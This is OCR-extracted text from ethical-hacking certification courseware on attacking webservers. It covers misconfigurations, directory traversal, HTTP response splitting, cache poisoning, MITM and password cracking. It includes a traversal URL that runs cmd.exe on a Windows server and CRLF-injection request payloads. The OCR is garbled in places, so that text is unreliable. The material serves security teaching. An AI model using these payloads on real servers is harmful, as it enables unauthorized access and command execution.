Rights Reserved. Reproduction is Strictly Prohibited.
  • 16. Ethical Hacking and Countermeasures Hacking Webservers 6 Exam 312-50 Certified Ethical Hacker End User's Concern: Usually, the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, make it possible for harmful applications, such as viruses, to invade the user's system. Besides, active content from a website browser can be a conduit for malicious software to bypass the firewall system and permeate the local area network. The table that follows shows the causes and consequences of web server compromises: Cause Consequence Installing the server with default settings Unnecessary default, backup, or sample files Improper file and directory permissions Security conflicts with business ease-of-use case Default accounts with their default passwords Unpatched security flaws in the server software, OS, and applications Misconfigured SSL certificates and encryption settings Use of self-signed certificates and default certificates Unnecessary services enabled, including content management and remote administration Misconfigurations in web server, operating systems and networks Lack of proper security policy, procedures, and maintenance Bugs in server software, OS, and web applications Improper authentication with external systems Administrative or debugging functions that are enabled or accessible TABBLE 12.1: causes and consequences of web server compromises Module 12 Page 1615 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 17. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Impact of Webserver Attacks CEH C«rt1fW 4 itfciul Nm Im © Data ta m p e rin g W e b s ite d e fa c e m e n t R o o t access to o th e r a p p licatio n s o r servers Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. I m p a c t o f W e b S e r v e r A tt a c k s Attackers can cause various kinds of damage to an organization by attacking a web server. The damage includes: 0 Compromise of user accounts: W eb server attacks are mostly concentrated on user account compromise. If the attacker is able to compromise a user account, then the attacker can gain a lot of useful information. Attacker can use the compromised user account to launch further attacks on the web server. 0 Data tampering: Attacker can alter or delete the data. He or she can even replace the data with malware so that whoever connects to the web server also becomes compromised. 0 W ebsite defacement: Hackers completely change the outlook of the website by replacing the original data. They change the website look by changing the visuals and displaying different pages with the messages of their own. 0 Secondary attacks from the website: Once the attacker compromises a web server, he or she can use the server to launch further attacks on various websites or client systems. 0 Data theft: Data is one of the main assets of the company. Attackers can get access to sensitive data of the company like source code of a particular program. Module 12 Page 1616 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 18. Ethical Hacking and Countermeasures Hacking Webservers 0 Exam 312-50 Certified Ethical Hacker Root access to other applications or server: Root access is the highest privilege one gets to log in to a network, be it a dedicated server, semi-dedicated, or virtual private server. Attackers can perform any action once they get root access to the source. Module 12 Page 1617 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 19. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker M odule Flow CEH Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u l e F lo w Considering that you became familiar with the web server concepts, we move forward to the possible attacks on web server. Each and every action on online is performed with the help of web server. Hence, it is considered as the critical source of an organization. This is the same reason for which attackers are targeting web server. There are many attack technique used by the attacker to compromise web server. Now we will discuss about those attack techniques. attack, HTTP response splitting attack, web cache poisoning attack, http response hijacking, web application attacks, etc. Webserver Concepts ^ Attack Methodology Webserver Pen Testing -y Module Webserver Attacks Patch Management 12 Page 1618 ^ J Webserver Attack Tools 3 Webserver Security Tools ■— ■— Counter-measures Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 20. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Web Server Misconfiguration CEH Server misconfiguration refers to configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers such as directory traversal, server intrusion, and data theft Verbose debug/error Remote Administration Functions Unnecessary Services Enabled Anonymous or Default Users/Passwords Sample Configuration, and Script Files Misconfigured/Default SSL Certificates Copyright © by E - t i c l All Rights Reserved. Reproduction is Strictly Prohibited. GGlni. W eb S e rv e r M is c o n fig u ra tio n W eb servers have various vulnerabilities related to configuration, applications, files, scripts, or web pages. Once these vulnerabilities are found by the attacker, like remote accessing the application, then these become the doorways for the attacker to enter into the network of a company. These loopholes of the server can help attackers to bypass user authentication. Server misconfiguration refers to configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers such as directory traversal, server intrusion, and data theft. Once detected, these problems can be easily exploited and result in the total compromise of a website. e Remote administration functions can be a source for breaking down the server for the attacker. © Some unnecessary services enabled are also vulnerable to hacking. 0 Misconfigured/default SSL certificates. © Verbose debug/error messages. Q Anonymous or default users/passwords. © Sample configuration and script files. Module 12 Page 1619 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 21. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Web Server Misconfiguration Example CEH httpd.conf file on an Apache server <Location /server-status> SetHandler server-status </Location> This configuration allows anyone to view the server status page, w hich contains detailed info rm atio n about the current use o f the web server, including info rm atio n about the cu rre n t hosts and requests being processed php.ini file display_error = On log_errors = On error_log = syslog ignore repeated errors = Off This configuration gives verbose error messages Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. f I W e b S e rv e r M is c o n fig u ra tio n E x a m p le ran n■ L 1 :J Consider the httpd.conf file on an Apache server. <Location /server-status> SetHandler server-status </Location> FIGURE 12.5: httpd.conf file on an Apache server This configuration allows anyone to view the server status page that contains detailed information about the current use of the web server, including information about the current hosts and requests being processed. Consider another example, the php.ini file. display_error = On log_errors - On error_log = syslog ignore repeated errors = Off FIGURE 12.6: php.inifile on an Apache server This configuration gives verbose error messages. Module 12 Page 1620 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 22. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker 3 Volume in drive C has no label. Volume Serial Number is D45E-9FEE j My Computer + 1 3Vb floppy (A:) £ / I ‫ י‬LocalDt>k(( B Ctocumcnte and Scttngs ! H t J Inetpub http://server.eom/s cripts/..%5c../Wind 0ws/System32/cm d.exe?/c+dir+c: Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. D i r e c t o r y T r a v e r s a l A t ta c k s W eb servers are designed in such a way that the public access is limited to some extent. Directory traversal is exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server root directory by manipulating a URL. Attackers can use the trial-and-error method to navigate outside of the root directory and access sensitive information in the system. Volume in drive C has no label. Volume Serial Number is D45E-9FEE Directory of C: http://server.eom/s cripts/..%5c../Wind 0ws/System32/cm d.exe?/c+dir+c: 1,024 .rnd 06/02/2010 11:31AM 09/28/2010 06:43 PM 0 123.text 05/21/2010 03:10 PM 0 AUTOEXEC.BAT 09/27/2010 08:54 PM <DIR> CATALINA_HOME 0 CONFIG.SYS 05/21/2010 03:10 PM Documents and Settings 08/11/2010 09:16 AM <DIR> 09/25/2010 05:25 PM <DIR> Downloads 08/07/2010 03:38 PM <DIR> Intel 09/27/2010 09:36 PM <DIR> Program Files 05/26/2010 02:36 AM <DIR> Snort 09/28/2010 09:50 AM <DIR> WINDOWS 09/25/2010 02:03 PM 569,344 WlnDump.exe 7 File(s) 570, 368 bytes 13 Dir( s) 13,432 ,115,200 bytes free F IG U R E Module 12 Page 1621 E Q-j !v!v!Tffxl company 1 ‫ ו‬downloads E O imgs ae O news scripts □ C J support 1 2 .7 : D i r e c t o r y T r a v e r s a l A t t a c k s Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 23. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker CEH HTTP R esponse Splitting Attack (•ttlfw tf HTTP response splitting attack involves adding header response data into the input field so that the server split the response into two responses itkNjI N hM M Input = Jason HTTP/1.1 200 OK Set-Cookie: author=Jason The attacker can control the first response to redirect user to a malicious website whereas the other responses will be discarded by web browser Input = JasonTheHackerrnHTTP/l.l 200 OKrn y String author = request.getParameter(AUTHOR_PA RAM ; ) Cookie cookie = new Cookie("author‫ , ״‬author); cookie.setMaxAge(cookieExpirat ion) ; response.addCookie(cookie); First Response (Controlled by Attacker) Set-Cookle: author=JasonTheHacker HTTP/1.1200 OK Second Response HTTP/1.1 200 OK Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. H T T P R e s p o n s e S p l itt i n g A tta c k An HTTP response attack is a web-based attack where a server is tricked by injecting new lines into response headers along with arbitrary code. Cross-Site Scripting (XSS)‫ ׳‬Cross Site Request Forgery (CSRF), and SQL Injection are some of the examples for this type of attacks. The attacker alters a single request to appear and be processed by the web server as two requests. The web server in turn responds to each request. This is accomplished by adding header response data into the input field. An attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the other responses will be discarded by web browser. Module 12 Page 1622 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 24. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Input = Jason HTTP/1.1 200 OK Set-Cookie: author=Jason Input =JasonTheHackerrnHTTP/l.l 200 OKrn First Response (Controlled by Attacker) o String author = request.getParameter(AUTHOR_PA RA ) ; M S i Cookie cookie = new Cookie("author", author); cookie.setMaxAge(cookieExpirat ion) ; response.addCookie(cookie); 0 5 <) / Set-Cookie; author=JasonTheHacker HTTP/1.1 200 OK S e c o n d R e sp o n se HTTP/1.1200 OK FIGURE 12.8: HTTP Response Splitting Attack Module 12 Page 1623 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 25. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Web Cache Poisoning Attack CEH Original Juggyboy page GET http://juggyboy.com/index.html HTTP/1.1 Pragma: no-cache Host: juggyboy.com Accept-Charset: iso-8859-1,*,utf-8 GET http://juggyboy.com/ redir.php?site=%Od%OaContentLength :%200%0d%0a%0d%0aHTTP/l.l%2 02(X>%20OK%0d%0aLastModified :%20Mon,%2027%200ct%20200 9%2014:50:18%20GMT*0d%0aConte ntLength :%2020%0d%0aContcnt• Typ«:%20text/htmr%0d%0a%0d%0a<html > Attack Pagc</html> HTTP/1.1 Host: Juggyboy.com GET http://juggyboy.com/index.html HTTP/1.1 Host: testsite.com User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept-Charset: iso-8859-l,*,utf8‫־‬ Attacker sends request to remove page from cache h ttp ://w w w .ju g g y b o y .c o m /w el com e.php?lang= Normal response after clearing the cache for juggyboy.com <?php h e a d e r ("L ocation:" . $_GET['page']); ?> Attacker sends malicious request that generates two responses (4 and 6) Attacker gets first server response An attacker forces the A ttacker re q u e s ts d juggyboy.com again to g e n e ra te ca ch e e n try The second response of request [3 that points to I attacker's page Attacker gets the second web server's cache to flush its actual cache content and sends a specially crafted request, which will be stored in cache Address Page www.jujjyboy.com Attacker's page Poisoned Server Cache Copyright © by E - t i c l All Rights Reserved. Reproduction is Strictly Prohibited. GGlni. W e b C a c h e P o i s o n i n g A tta c k W eb cache poisoning is an attack that is carried out in contrast to the reliability of an intermediate web cache source, in which honest content cached for a random URL is swapped with infected content. Users of the web cache source can unknowingly use the poisoned content instead of true and secured content when demanding the required URL through the web cache. An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request to store in cache. In the following diagram, the whole process of web cache poisoning is explained in detail with a step-by-step procedure. Module 12 Page 1624 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 26. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Addm www.Im^YLuy.cum GET http://juggyboy.com/indeM.html HTTP/1.1 Pragm a: no-cache H ost: juggyboy.com A ccept-C harset: iso-8859-1,T,utf-8 GET http://juggyboy.com/ r«dir.php?site=%Od%OaContentL*ngth:%200%Od%Oa%Od%OaHTTP/l.l%2 02009(2OOKHOdKOaLastModified :%20Mon,%202 7%200ct%20200 9*2014:50:18K20GMT%0d%0aContentLength: 020%0d%0aContentTyp«:%20text/html%0d%0a%0d%08<htm! *Attack Page</html> HTTP/1.1 Ofigln.il Juggyboy page Server Cache I A ttac k er s e n d s re q u e s t t o re m o v e page from cache http://www.juggyboy.com/wel come.php?lang= Norm al re s p o n s e a f te r clearing th e cache forjuggyboy.com <?php header ("Location:" . $_GET['page']); ?> A ttac k er s e n d s m alicious re q u e s t th a t g e n e ra te s tw o re s p o n s e s (4 and 6) 2 Host: juggyboy.com GET h ttp ://ju g g y b o y .c o m /in d e x .h tm l HTTP/1.1 Host: te s ts ite .c o m U ser-A gent: M ozilla/4.7 [en] (W lnNT; I) Accept-Charset iso-8859-l,‫,״‬utf-8 A ttac k er g e ts first se rv e r re s p o n s e Attacker re q u e sts a ju g g Y b o y.co m again to generate cache entry Attack!e r g e ts t h e second _> 1 ; __ . ‫׳‬W re q u e s t o f o n s e ^ ..... ......■ > The ind res! .ponse of ‫ י‬requ th a t p o in t! to :k e f's page Address www.JuKjjytiyy.to1n 1 ‘igr AtU ckvr'vp^v Poisoned Server Cache FIGURE 12.9: Web Cache Poisoning Attack Module 12 Page 1625 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 27. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker + Copyright © by EG-GtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited. HTTP R esp o n se H ijack in g HTTP response hijacking is accomplished with a response splitting request. In this attack, initially the attacker sends a response splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. On receiving the response from web server, the victim requests for service by giving credentials. At the same time, the attacker requests the index page. Then the web server sends the response of the victim's request to the attacker and the victim remains uninformed. The diagram that follows shows the step-by-step procedure of an HTTP response hijacking attack: Module 12 Page 1626 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 28. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker FIGURE 12.10: HTTP Response Hijacking Module 12 Page 1627 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 29. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker SSH B r u te f o rc e A tta c k CEH C«rt1fW 4 1^1 itfciul lUclw( SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network Attackers can bruteforce SSH login credentials to gain unauthorized access to a SSH tunnel q SSH tunnels can be used to transmit malwares and other exploits to victims without being detected I Mail Server Internet User SSH Server Web Server Application Server File Server Attacker Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. SSH B r u te F o r c e A tt a c k SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network. In order to conduct an attack on SSH, first the attacker scans the entire SSH server to identify the possible vulnerabilities. With the help of a brute force attack, the attacker gains the login credentials. Once the attacker gains the login credentials of SSH, he or she uses the same SSH tunnels to transmit malware and other exploits to victims without being detected. I Mail Server Attacker FIGURE 12.11: SSH Brute Force Attack Module 12 Page 1628 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 30. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Man-in-the‫־‬Middle Attack CEH J Man-in-the-Middle (M ITM ) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end-user and webservers J Attacker acts as a proxy such that all the communication between the user and Webserver passes through him Normal Traffic p o* • O • - W ebserver a Attacker Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M a n ‫־‬i n ‫־‬t h e ‫־‬M i d d l e A tta c k A man-in-the-middle attack is a method where an intruder intercepts or modifies the message being exchanged between the user and web server through eavesdropping or intruding into a connection. This allows an attacker to steal sensitive information of a user such as online banking details, user names, passwords, etc. transferred over the Internet to the web server. The attacker lures the victim to connect to the web server through by pretending to be a proxy. If the victim believes and agrees to the attacker's request, then all the communication between the user and the web server passes through the attacker. Thus, the attacker can steal sensitive user information. Module 12 Page 1629 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 31. Ethical Hacking and Countermeasures Hacking Webservers n U Exam 312-50 Certified Ethical Hacker Normal Traffic User visits a website >•‫״‬ User ^‫־‬ & © . * * * .. '''• ^ 9 0 * Attacker sniffs the communication to ; stealI session IDs (f t v s © e ..* < ‫* • .־‬ e ^ ,., w .• ,‫5יי‬ ‫־‬ ''.•‫־‬ A• • ‘‘ Attacker FIGURE 12.12: Man-in-the-Middle Attack Module 12 Page 1630 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 32. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker W ebserver P assw ord C rack in g C EH An attacker tries to exploit weaknesses to hack well-chosen passwords **** Many hacking attempts start The most common passwords with cracking passwords and found are password, root, administrator, admin, demo, test, proves to the Webserver that they are a valid user guest, qwerty, pet names, etc. Attackers use different methods such as social engineering, Web form authentication cracking spoofing, phishing, using a Trojan SSH Tunnels Horse or virus, wiretapping, FTP servers keystroke logging, etc. SMTP servers Web shares Copyright © by E - * n i . All Rights Reserved. Reproduction is Strictly Prohibited. GGacl W eb S e rv e r P a s s w o rd C ra c k in g ----- Most hacking starts with password cracking only. Once the password is cracked, the hacker can log in in to the network as an authorized person. Most of the common passwords found are password, root, administrator, admin, demo, test, guest, QWERTY, pet names, etc. Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan horse or virus, wiretapping, keystroke logging, a brute force attack, a dictionary attack, etc. to crack passwords. Attackers mainly target: © W eb form authentication cracking © SSH tunnels 0 FTP servers © SMTP servers © W eb shares Module 12 Page 1631 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 33. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker W ebserver Password C racking Techniques EH Passwords may be cracked manually or with automated tools such as Cain and Abel, Brutus, THC Hydra, etc. I Passwords can be cracked by using following techniques: 4 Hybrid Attack A hybrid attack works similar to dictionary attack, but it adds numbers or symbols to the password attempt Copyright © by E - * n i . All Rights Reserved. Reproduction is Strictly Prohibited. GCacl W eb S erver P assw o rd C ra c k in g T e c h n iq u e s ■gd© ® ‫_ ( 77 ) רדד׳‬ Passwords may be cracked manually or with automated tools such as Cain & Abel, Brutus, THC Hydra, etc. Attackers follow various techniques to crack the password: © Guessing: A common cracking method used by attackers is to guess passwords either by humans or by automated tools provided with dictionaries. Most people tend to use heir pets' names, loved ones' names, license plate numbers, dates of birth, or other weak pass words such as "QW ERTY," "password," "admin," etc. so that they can remember them easily. The same thing allows the attacker to crack passwords by guessing. © Dictionary Attack: A dictionary attack is a method that has predefined words of various combinations, but this might also not be possible to be effective if the password consists of special characters and symbols, but compared to a brute force attack this is less time consuming. © Brute Force Attack: In the brute force method, all possible characters are tested, for example, uppercase from "A to Z" or numbers from "0 to 9" or lowercase "a to z." But this type of method is useful to identify one-word or two-word passwords. Whereas if a password consists of uppercase and lowercase letters and special characters, it might take months or years to crack the password, which is practically impossible. Module 12 Page 1632 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 34. Ethical Hacking and Countermeasures Hacking Webservers Q Exam 312-50 Certified Ethical Hacker Hybrid Attack: A hybrid attack is more powerful as it uses both a dictionary attack and brute force attack. It also consists of symbols and numbers. Password cracking becomes easier with this method. Module 12 Page 1633 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 35. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Web Application Attacks J ! CEH C«rt1fW 4 itfciul Nm Im Vulnerabilities in web applications running on a Webserver provide a broad attack path for Webserver compromise , If enia'0 f.s T eCt°rv C°okie rO Site ss. rge, A t, '° n 4 ■ cks Olv ft, a ‫׳‬erf/, s ‫' ׳‬ring »Pe, Note: For complete coverage of web application attacks refer to Module 13: Hacking Web Applications Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n A tt a c k s SL Vulnerabilities in web applications running on a web server provide a broad attack path for web server compromise. Directory Traversal Directory traversal is exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server root directory by manipulating a URL. Parameter/Form Tampering This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Cookie Tampering Cookie tampering is the method of poisoning or tampering with the cookie of the client. The phases where most of the attacks are done are when sending a cookie from the client side to the server. Persistent and non-persistent cookies can be modified by using different tools. Module 12 Page 1634 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 36. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Command Injection Attacks Command injection is an attacking method in which a hacker alters the content of the m web page by using html code and by identifying the form fields that lack valid constraints. Buffer Overflow Attacks I Most web applications are designed to sustain some amount of data. If that amount is exceeded, the application may crash or may exhibit some other vulnerable behavior. The attacker uses this advantage and floods the applications with too much data, which in turn causes a buffer overflow attack. Cross-Site Scripting (XSS) Attacks jr Cross-site scripting is a method where an attacker injects HTML tags or scripts into a target website. Denial-of-Service (DoS) Attack M A denial-of-service attack is a form of attack method intended to terminate the operations of a website or a server and make it unavailable to access for intended users. Unvalidated Input and File injection Attacks Unvalidated input and file injection attacks refer to the attacks carried by supplying an unvalidated input or by injecting files into a web application. Cross-Site Request Forgery (CSRF) Attack The user's web browser is requested by a malicious web page to send requests to a malicious website where various vulnerable actions are performed, which are not intended by the user. This kind of attack is dangerous in the case of financial websites. SQL Injection Attacks SQL injection is a code injection technique that uses the security vulnerability of a database for attacks. The attacker injects malicious code into the strings that are later on passed on to SQL Server for execution. Session Hijacking 1131 Session hijacking is an attack where the attacker exploits, steals, predicts, and negotiates the real valid web session control mechanism to access the authenticated parts of a web application. Module 12 Page 1635 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 37. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker M odule Flow CEH Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u l e F lo w _ So far we have discussed web server concepts and various techniques used by the attacker to hack web server. Attackers usually hack a web server by following a procedural method. Now we will discuss the attack methodology used by attackers to compromise web servers. Webserver Concepts Webserver Attacks Attack Methodology 1 Webserver Attack Tools Webserver Pen Testing y Patch Management i ) ■— ■— Webserver Security Tools Counter-measures This section provides insight into the attack methodology and tools that help at various stages of hacking. Module 12 Page 1636 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 38. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker - W ebserver Attack M ethodology Information Gathering C EH W ebserver Footprinting Vulnerability Scanning H a ck in g W e b se rve r Passw ords Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S e r v e r A tta c k M e t h o d o l o g y Hacking a web server is accomplished in various stages. At each stage the attacker tries to gather more information about loopholes and tries to gain unauthorized access to the web server. The stages of web server attack methodology include: Inform ation G athering 0 Every attacker tries to collect as much information as possible about the target web server. Once the information is gathered, he or she then analyzes the gathered information in order to find the security lapses in the current mechanism of the web server. ( W eb Server Footprinting The purpose of footprinting is to gather more information about security aspects of a web server with the help of tools or footprinting techniques. The main purpose is to know about its remote access capabilities, its ports and services, and the aspects of its security. M irroring W ebsite W 4 J) Website mirroring is a method of copying a website and its content onto another server for offline browsing. V ulnerability Scanning Module 12 Page 1637 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 39. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Vulnerability scanning is a method of finding various vulnerabilities and misconfigurations of a web server. Vulnerability scanning is done with the help of various automated tools known as vulnerable scanners. Session H ijacking Session hijacking is possible once the current session of the client is identified. Complete control of the user session is taken over by the attacker by means of session hijacking. H acking Web Server Passw ords Attackers use various password cracking methods like brute force attacks, hybrid attacks, dictionary attacks, etc. and crack web server passwords. Module 12 Page 1638 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 40. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Webserver Attack Methodology: Information Gathering Information gathering involves collecting information about the targeted company CEH WHOis.net Y3ur Domain Starting Place... Attackers search the Internet, newsgroups, bulletin boards, etc. UZ3 for information about the company Attackers use Whois, Traceroute, Active Whois, etc. tools and query the Whois databases to get the details such as a domain WHOIS information for ebay.com:*** [Querying who1s.vens1gn-grs.com] [whols.verislgn-grs.com] Who»s Server Vereon 2.0 Domain names in the .com and .net domains can now be reoistered with rrorv diftoront competing raaistrars. Go to http;///ww .intom <x«t for detailed information. Domain Name: EBAY.COM Registrar: MARKM0N1T0R INC. Whois Server: whois.maricwiitjor.com Reterral URL: http://www.marXmonicor.com Name Server: yC-ONSl.CDAYDNS.COM name, an IP address, or an autonomous system number N 0ooS DS.bADS O 3 Sr f JCN BYN M m v: 2 .C Note: For complete coverage of information gathering techniques refer to Module 02: Footprinting and Reconnaissance N3m« sorvor: SMF UNSl.fcBAYDNS.COM Name Server: SMF-DNSi.fcBAYDNS.COM Status: dleotDeletcPiohlblted Status: clieritTrmsf«Pral1ibit*d Status: dienWpdnt*Prohibit*d Status: s e rv e d eteProhibited Status: server TransterProh 1 itod b Status: sorvorUDdateProhibital updated Date: 15-Sep-2010 Creation Date: 04-aug-l995 Expiration Date: 03-aug-2018 h :/ w ww o .n t ttp / w . h is e Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. » W eb S e rv e r $ , G a th e rin g __ A t ta c k M e th o d o l o g y : In fo rm a tio n Every attacker before hacking first collects all the required information such as versions and technologies being used by the web server, etc. Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company. Most of the attackers' time is spent in the phase of information gathering only. That's why information gathering is both an art as well as a science. There are many tools that can be used for information gathering or to get details such as a domain name, an IP address, or an autonomous system number. The tools include: e e Traceroute e Active Whois e Nmap 0 Angry IP Scanner e # Whois Netcat W hois Module 12 Page 1639 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 41. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Source: http://www.whois.net Whois allows you to perform a domain whois search and a whois IP lookup and search the whois database for relevant information on domain registration and availability. This can help provide insight into a domain's history and additional information. It can be used for performing a search to see who owns a domain name, how many pages from a site are listed with Google, or even search the Whois address listings for a website's owner. W H O is .n e t Y o u r D o m a in S t a r t i n g P l a c e . . . WHOIS information for ebay.com:*** [Querying whois.verisign-grs.com] [whois.verisign-grs.com] Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: EBAY.COM Registrar: MARKMONITOR INC. Whois Server: whois.markmonitDr.com Referral URL: http://www.markmonitor.com Name Server: SJC-DNS1.EBAYDNS.COM Name Server: SJC-DNS2.EBAYDNS.COM Name Server: SMF-DNS1.EBAYDNS.COM Name Server: SMF-DNS2.EBAYDNS.COM Status: dientDeleteProhibited Status: dientTransferProhibited Status: dientUpdateProhibited Status: serverDeleteProhibited Status: serverTransferProhibited Status: serverUpdateProhibited Updated Date: 15-sep2010‫־‬ Creation Date: 04-aug-1995 Expiration Date: 03-aug2018‫־‬ « F IG U R E 1 2 .1 3 : W H O I S In f o r m a t io n G a t h e r in g Module 12 Page 1640 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 42. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Webserver Attack Methodology: Webserver Footprinting J Telnet a Webserver to footprint a Webserver and gather information such as server name, server type, operating systems, applications running, etc. J ilhiul lUthM Gather valuable system-level information such as account details, operating system, software versions, server names, and database schema details J C EH Urt1fw4 Use tool such as ID Serve, httprecon, and Netcraft to perform footprinting Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S e r v e r A tta c k M e th o d o l o g y : W e b s e r v e r F o o tp rin tin g The purpose of footprinting is to gather account details, operating system and other software versions, server names, and database schema details and as much information as possible about security aspects of a target web server or network. The main purpose is to know about its remote access capabilities, open ports and services, and the security mechanisms implemented. Telnet a web server to footprint a web server and gather information such as server name, server type, operating systems, applications running, etc. Examples of tools used for performing footprinting include ID Serve, httprecon, Netcraft, etc. N etcraft Source: http://toolbar.netcraft.com Netcraft is a tool used to determine the OSes in use by the target organization. It has already been discussed in detail in the Footprinting and Reconnaissance module. Module 12 Page 1641 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
